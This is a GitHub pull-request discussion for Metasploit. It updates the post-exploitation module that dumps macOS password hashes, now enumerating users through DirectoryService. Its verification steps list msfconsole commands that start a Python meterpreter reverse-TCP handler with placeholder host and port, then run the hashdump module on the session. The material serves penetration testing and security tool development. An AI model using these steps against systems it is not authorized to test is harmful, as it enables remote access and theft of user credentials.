-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
hash_dump now working properly up to Mac OS X High Sierra (10.13.6 in… #10594
hash_dump now working properly up to Mac OS X High Sierra (10.13.6 in… #10594
Conversation
Instead of reimplementing it, this should just call Msf::Post::OSX::System.get_users instead. That way it's using common library code, which is better tested than a one-off in a module. |
I opened another pull request 5 days ago, as acammack-r7 suggested. Days have passed, no news about the pull, now it's even labeled as "bug". Can you please explain what's going on? |
We're sorry for the delay in getting this merged. It's marked a |
Of course, I can try it! I hope I will be able to fix both (get_nonsystem_accounts, and post/osx/gather/hashdump) before the weekend ends. I'm going to modify this pull request for the hashdump module. Thank you (timwr and busterb) for your suggestions. Will let you know as soon as I've some news. |
Cool @ssh3ll ! Feel free to modify lib/msf/core/post/osx/system.rb however you like in this pull request. If it works we'll merge it here. Many thanks! |
I can go ahead and make the changes I was suggesting. Just need to test them. |
Release NotesThis updates the hashdump module to work on newer versions of macOS, while increasing the robustness of existing user enumeration functions in the core library for macOS. |
split("\n\n") was not returning the expected value because the command as actually printing "\r\n\r\n" as though this were Windows. Since apparently this is behavior that has changed over time, I added a normalization pass first with |
@timwr something I noticed while testing this with get_users was that python meterpreter doesn't appear to close the PTY after launching a subprocess. Running this module with lots of users makes it easy to get this error:
|
"Long" time I don't check this. Apologies for the delay and thanks to everyone. |
Oh, I should have pinged @zeroSteiner: there appears to be a PTY leak when running subprocesses with python meterpreter that this unveiled. |
…cluded)
This changes fix a simple issue which was preventing the module to work properly.
The initial idea was to add the support for newer Mac OS X releases. However, looks like the script works fine with the applied changes, also for the newer releases.
Initially, the script was retrieving the usernames using the ls utility. However, this behaviour may have led to several unexpected results. As an example, any file/directory stored under the /Users directory would have been considered as a regular user (which doesn't even make sense).
With the applied changes, the usernames are retrieved directly from the DirectoryService, providing a more reliable way to obtain usernames and consequently allowing the script to retrieve the correct hashes.
Verification
List the steps needed to make sure this thing works
Start 'msfconsole'
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost dummy_ip
set lport dummy_port
exploit -j
Wait for a valid Python meterpreter reverse TCP shell (assuming its spawned as 'session 1')
use post/osx/gather/hashdump
set session 1
run